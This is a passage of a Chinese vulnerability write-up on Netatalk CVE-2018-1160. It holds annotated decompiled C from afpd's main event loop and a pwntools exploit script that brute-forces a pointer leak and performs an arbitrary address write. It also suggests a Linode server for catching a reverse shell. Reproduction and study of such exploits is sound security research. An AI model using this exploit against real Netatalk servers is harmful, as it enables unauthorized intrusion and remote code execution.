&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;( (unsignedint)dword_245298<=1&nbsp;)
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;gotoLABEL_44;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;v37="main: reset socket handlers";
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;v38=369;
LABEL_94:
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// 记录错误日志
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;make_log_entry(2,&nbsp;3,&nbsp;"main.c",&nbsp;v38,&nbsp;v37,&nbsp;v3);
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;gotoLABEL_44; &nbsp;&nbsp;// exit(2)
&nbsp; &nbsp; &nbsp; &nbsp; }

LABEL_45:
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// 记录配置重载日志
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;( (unsignedint)dword_245298>4&nbsp;)
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;make_log_entry(5,&nbsp;3,&nbsp;"main.c",&nbsp;373,&nbsp;"re-reading configuration file",&nbsp;v3);

&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// 释放旧配置
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;configfree(&unk_25C5C0,&nbsp;0);
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;afp_config_free(&unk_25C5C0);

&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// 重新解析配置文件
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;( (unsignedint)afp_config_parse(&unk_25C5C0,&nbsp;"afpd") )
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;gotoLABEL_44; &nbsp;&nbsp;// 解析失败，退出

&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// 重新初始化服务（新配置可能改变了监听端口/地址）
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;( (unsignedint)configinit(&unk_25C5C0) )
&nbsp; &nbsp; &nbsp; &nbsp; {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;( (unsignedint)dword_245298>1&nbsp;)
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;v37="config re-read: no servers configured";
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;v38=382;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;gotoLABEL_94;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }
LABEL_44:
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;exit(2); &nbsp;&nbsp;// 配置错误，退出码2
&nbsp; &nbsp; &nbsp; &nbsp; }

&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// 重新初始化 socket 事件处理器
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;(&nbsp;!(unsigned__int8)sub_28480() )
&nbsp; &nbsp; &nbsp; &nbsp; {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;( (unsignedint)dword_245298>1&nbsp;)
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;make_log_entry(2,&nbsp;3,&nbsp;"main.c",&nbsp;387,&nbsp;"main: couldn't initialize socket handler",&nbsp;v20);
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;gotoLABEL_44;
&nbsp; &nbsp; &nbsp; &nbsp; }

&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// 配置重载成功，恢复正常运行
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;v21=qword_25C5B8;
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;nologin=0; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;// 允许新连接
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;dword_25C5B4=0; &nbsp; &nbsp;&nbsp;// 清除重载标志
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;*v7=v10; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;// 恢复 errno
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;i=qword_25C5A8;

&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// 向所有现有子进程发送 SIGHUP，让它们也重载配置
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;(&nbsp;v21&nbsp;)
&nbsp; &nbsp; &nbsp; &nbsp; {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;server_child_kill(v21,&nbsp;1); &nbsp;// 1 = SIGHUP
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;i=qword_25C5A8;
&nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// 内层 while(1) 将继续，回到 LABEL_17 重新 poll
&nbsp; &nbsp; &nbsp; }

&nbsp; &nbsp; &nbsp;&nbsp;/* ── 4.3 poll() 返回值处理 ── */
&nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;(&nbsp;!v9&nbsp;)
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;gotoLABEL_38; &nbsp;&nbsp;// poll 超时（返回0），回到顶部继续等待

&nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;(&nbsp;v9<0&nbsp;)
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;break; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// poll 出错（返回-1），跳出中层循环检查 errno

&nbsp; &nbsp; &nbsp;&nbsp;/* ── 4.4 遍历就绪的 fd，分发事件 ── */
&nbsp; &nbsp; &nbsp;&nbsp;i=qword_25C5A8;
&nbsp; &nbsp; &nbsp;&nbsp;v11=0; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// fd 数组索引
&nbsp; &nbsp; &nbsp;&nbsp;v12=qword_25C5A8;

&nbsp; &nbsp; &nbsp;&nbsp;// *(int*)(qword_25C5A8 + 20) = 当前 fd 总数
&nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;(&nbsp;*(int*)(qword_25C5A8+20)&nbsp;>0&nbsp;)
&nbsp; &nbsp; &nbsp; {
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;while&nbsp;(&nbsp;1&nbsp;)
&nbsp; &nbsp; &nbsp; &nbsp; {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// 检查 revents 字段（offset+6）是否有事件：
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// 0x39 = POLLIN(0x01)|POLLPRI(0x02)|POLLERR(0x08)|POLLHUP(0x10)|POLLRDNORM(0x40)
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// 实际使用的位：0x01(POLLIN) | 0x08(POLLERR) | 0x10(POLLHUP) | 0x20(POLLRDBAND)
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;( (*(_BYTE*)(*(_QWORD*)v12+8*v11+6)&nbsp;&0x39)&nbsp;!=0&nbsp;)
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// 获取该 fd 对应的用户数据结构（附加在 pollfd 后的元数据）
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;v14=*(_QWORD*)(v12+8)&nbsp;+16*v11;

&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;/* ── 4.4.1 类型0：子进程 IPC 消息 ── */
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;(&nbsp;!*(_DWORD*)v14&nbsp;)
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// v29 指向子进程描述符结构
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;v29=*(_DWORD**)(v14+8);
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;( (unsignedint)dword_245298>5&nbsp;)
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;make_log_entry(6,&nbsp;3,&nbsp;"main.c",&nbsp;440,&nbsp;"main: IPC request from child[%u]",&nbsp;*v29);

&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// 从子进程读取 IPC 消息（如用户认证结果、会话信息等）
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;v30=ipc_server_read(qword_25C5B8, (unsignedint)v29[12]); &nbsp;// v29[12] = IPC fd
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;v12=qword_25C5A8;

&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;(&nbsp;v30&nbsp;) &nbsp;// IPC 读取失败（子进程异常断开）
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// 从事件循环删除该 IPC fd
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;(&nbsp;!(unsigned__int8)asev_del_fd(qword_25C5A8, (unsignedint)v29[12])
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;&&&nbsp;(unsignedint)dword_245298>1&nbsp;)
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;make_log_entry(2,&nbsp;3,&nbsp;"main.c",&nbsp;444,&nbsp;"child[%u]: no IPC fd",&nbsp;v31);
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// 关闭 IPC fd，标记为无效
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;close(v29[12]);
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;v29[12]&nbsp;=-1;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;v12=qword_25C5A8;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;gotoLABEL_26;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }

&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;/* ── 4.4.2 类型1：新的 DSI 连接请求 ── */
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;(&nbsp;*(_DWORD*)v14==1&nbsp;)
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;v13=*(_QWORD*)(v14+8); &nbsp;// DSI 结构指针
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;rlimits.rlim_cur=0; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// 清零，用于接收新子进程信息

&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// 为新连接创建会话（内部会 fork() 子进程处理该客户端）
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// dword_25C5E4 = 最大子进程数限制
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;( (unsignedint)dsi_getsession(v13,&nbsp;qword_25C5B8, (unsignedint)dword_25C5E4,&nbsp;&rlimits) )
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// fork 或会话建立失败
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;( (unsignedint)dword_245298>1&nbsp;)
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;v35=strerror(*v7);
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;make_log_entry(2,&nbsp;3,&nbsp;"main.c",&nbsp;467,&nbsp;"dsi_start: session error: %s",&nbsp;v35);
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;v12=qword_25C5A8;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;gotoLABEL_26;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;else
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;(&nbsp;!rlimits.rlim_cur&nbsp;)
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;/* ★ 这是 fork() 后的子进程执行路径 ★
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;* 子进程不返回到主循环，而是：
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;* 1. 释放父进程的配置资源（不再需要监听其他连接）
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;* 2. 调用 afp_over_dsi() 进入 AFP 协议处理循环
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;* 3. exit(0) 正常退出 */
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;configfree(&unk_25C5C0,&nbsp;v13); &nbsp;// 释放父进程配置（子进程中）
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;afp_over_dsi(&unk_25C5C0); &nbsp; &nbsp; &nbsp;// 处理单个客户端的 AFP 会话
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;exit(0);
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }

&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;/* 父进程执行路径：rlimits.rlim_cur 指向新子进程描述符 */
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;rlim_cur=rlimits.rlim_cur;

&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// 将子进程的 IPC fd 注册到事件循环中，以便接收其后续消息
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// offset+48 处存储子进程的 IPC socket fd
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;v32=asev_add_fd(qword_25C5A8,&nbsp;*(unsignedint*)(rlimits.rlim_cur+48),&nbsp;0,&nbsp;rlimits.rlim_cur);
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;v33=&nbsp;(__pid_t*)rlim_cur;

&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;(&nbsp;!v32&nbsp;) &nbsp;// 事件槽已满（超出 asev 容量上限）
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;( (unsignedint)dword_245298>1&nbsp;)
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;make_log_entry(2,&nbsp;3,&nbsp;"main.c",&nbsp;419,&nbsp;"out of asev slots");
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;v33=&nbsp;(__pid_t*)rlim_cur;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// 无法监控该子进程：关闭 IPC fd 并强制 SIGKILL 子进程
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;v59=v33;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;close(v33[12]); &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// 关闭 IPC fd
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;v34=*v59; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// 获取子进程 PID（结构首字段）
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;v59[12]&nbsp;=-1; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// 标记 fd 为无效
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;kill(v34,&nbsp;9); &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// SIGKILL 强制终止子进程
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;v12=qword_25C5A8;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;gotoLABEL_26;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;else
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;/* ── 4.4.3 未知类型：记录调试日志并忽略 ── */
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;( (unsignedint)dword_245298<=5&nbsp;)
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;gotoLABEL_26;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;make_log_entry(6,&nbsp;3,&nbsp;"main.c",&nbsp;452,&nbsp;"main: IPC request for unknown type");
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;v12=qword_25C5A8;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }

LABEL_26:
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// 移动到下一个 fd
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;++v11;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;i=v12;
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;// 检查是否已遍历所有 fd
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;(&nbsp;*(_DWORD*)(v12+20)&nbsp;<=&nbsp;(int)v11&nbsp;)
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;gotoLABEL_17; &nbsp;// 所有 fd 处理完毕，重新 poll
&nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; }

&nbsp; &nbsp;&nbsp;/* ── 4.5 poll 错误处理 ── */
&nbsp; &nbsp;&nbsp;// poll 返回 -1，检查是否因为信号中断（EINTR=4）
&nbsp; &nbsp;&nbsp;if&nbsp;(&nbsp;v10!=4&nbsp;)
&nbsp; &nbsp; &nbsp;&nbsp;break; &nbsp;&nbsp;// 非 EINTR 错误：跳出外层循环，记录错误退出

&nbsp; &nbsp;&nbsp;// errno == EINTR（信号中断了 poll）：正常现象，继续主循环
LABEL_38:
&nbsp; &nbsp; ; &nbsp;// 空语句，继续 for 循环
&nbsp; }

&nbsp;&nbsp;/* ══════════════════════════════════════════════
&nbsp; &nbsp;* 五、异常退出处理
&nbsp; &nbsp;* ══════════════════════════════════════════════ */

&nbsp;&nbsp;// poll 遇到非 EINTR 的真实错误（如 EBADF, ENOMEM 等）
&nbsp;&nbsp;if&nbsp;( (unsignedint)dword_245298>1&nbsp;)
&nbsp; {
&nbsp; &nbsp;&nbsp;v27=strerror(v10); &nbsp;// 将 errno 转换为可读字符串
&nbsp; &nbsp;&nbsp;// 级别2(WARN) 记录错误
&nbsp; &nbsp;&nbsp;make_log_entry(2,&nbsp;3,&nbsp;"main.c",&nbsp;408,&nbsp;"main: can't wait for input: %s",&nbsp;v27);
&nbsp; }

&nbsp;&nbsp;// 正常返回（实际上主循环理论上不应退出，到这里说明发生了严重错误）
&nbsp;&nbsp;return0;
}

/*
* ══════════════════════════════════════════════════════════
* 附：关键全局变量说明
* ══════════════════════════════════════════════════════════
*
* qword_25C5A8 &nbsp;— 异步事件（asev）主循环结构指针
* &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 包含: pollfd数组指针(offset 0)、fd计数(offset 20)、
* &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 用户数据数组指针(offset 8)
*
* qword_25C5B8 &nbsp;— server_child 结构指针（子进程管理表）
*
* qword_25C5D8 &nbsp;— DSI 服务器链表头（用于遍历所有监听端口）
*
* dword_25C5B0 &nbsp;— SIGCHLD 标志位（子进程退出时由信号处理器置1）
*
* dword_25C5B4 &nbsp;— SIGHUP/SIGUSR1 标志位（触发配置重载）
*
* dword_25C5E0 &nbsp;— 最大子进程数（来自配置文件 maxconnections）
*
* dword_25C5E4 &nbsp;— 最大同时连接数（来自配置）
*
* dword_245298 &nbsp;— 全局日志级别（越大越详细）
* &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 1=ERROR, 2=WARN, 3=INFO, 4=注意, 5=DEBUG, 6=TRACE
*
* nologin &nbsp; &nbsp; &nbsp; — 非0时禁止新的 AFP 连接（配置重载期间使用）
*
* mask &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;— umask 值（来自配置或命令行）
*
* ══════════════════════════════════════════════════════════
* 附：子进程退出状态解码（POSIX wstatus）
* ══════════════════════════════════════════════════════════
*
* &nbsp; wstatus & 0x7F == 0 &nbsp; → 正常退出，退出码 = (wstatus >> 8) & 0xFF
* &nbsp; wstatus & 0x7F != 0 &nbsp; → 被信号终止，信号号 = wstatus & 0x7F
* &nbsp; wstatus & 0x80 != 0 &nbsp; → 产生了 core dump
&nbsp;*/

给我们的数据就是一个afpd的一个核心部件

 main()
├─1.初始化       命令行解析→daemon化→读配置→分配子进程表
├─2.信号注册     7个信号，互相屏蔽，SA_RESTART
├─3.服务启动     configinit→cnid_init→socket事件初始化→提升fd上限
└─4.主事件循环（poll驱动）
       ├─SIGCHLD→waitpid回收子进程
       ├─SIGHUP/SIGUSR1→热重载配置文件
       └─fd就绪分发
             ├─类型0：子进程IPC消息→ipc_server_read()
             └─类型1：新客户端连接→dsi_getsession() →fork
                    子进程：afp_over_dsi()  ←处理单个AFP会话
                     父进程：注册子进程IPCfd到事件循环

我们使用的exp是下面这个

 frompwnimport*
context(endian='little')

ip   ="127.0.0.1"
port=5566

defgen_dsi(data):
    dsi  =b'\x00\x04\x00\x01'
    dsi+=p32(0)
    dsi+=p32(len(data),endian='big')
    dsi+=p32(0)
    dsi+=data
    returndsi

defaaw(io,addr,data):
    payload  =b'\x01'+p8(0x18)+b'a'*0x10+p64(addr)
    io.send(gen_dsi(payload))
    io.recv()
    io.send(gen_dsi(data))

defboom():
    leak=b''
    forjinrange(8):
        foriinrange(256):
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if(j>1andj<6):&nbsp;i=255-i
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;io=remote(ip,port)
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;payload&nbsp;&nbsp;=b'\x01'+p8(0x11+j)+b'a'*0x10+leak+p8(i)
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;io.send(gen_dsi(payload))
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;try:
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;a=io.recv()
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;leak+=p8(i)
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;log.success(str(hex(i)))
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;io.close()
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;break
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;except:
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;io.close()
&nbsp; &nbsp;&nbsp;returnu64(leak)

leak_addr=boom()
log.success(hex(leak_addr))

input()
io=remote(ip,port)
&nbsp;aaw(io,leak_addr,b"xuanxuan")

最好使用linode的服务器来监听反弹shell

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：小M安全 《Netatalk CVE-2018-1160 复现及漏洞利用思路》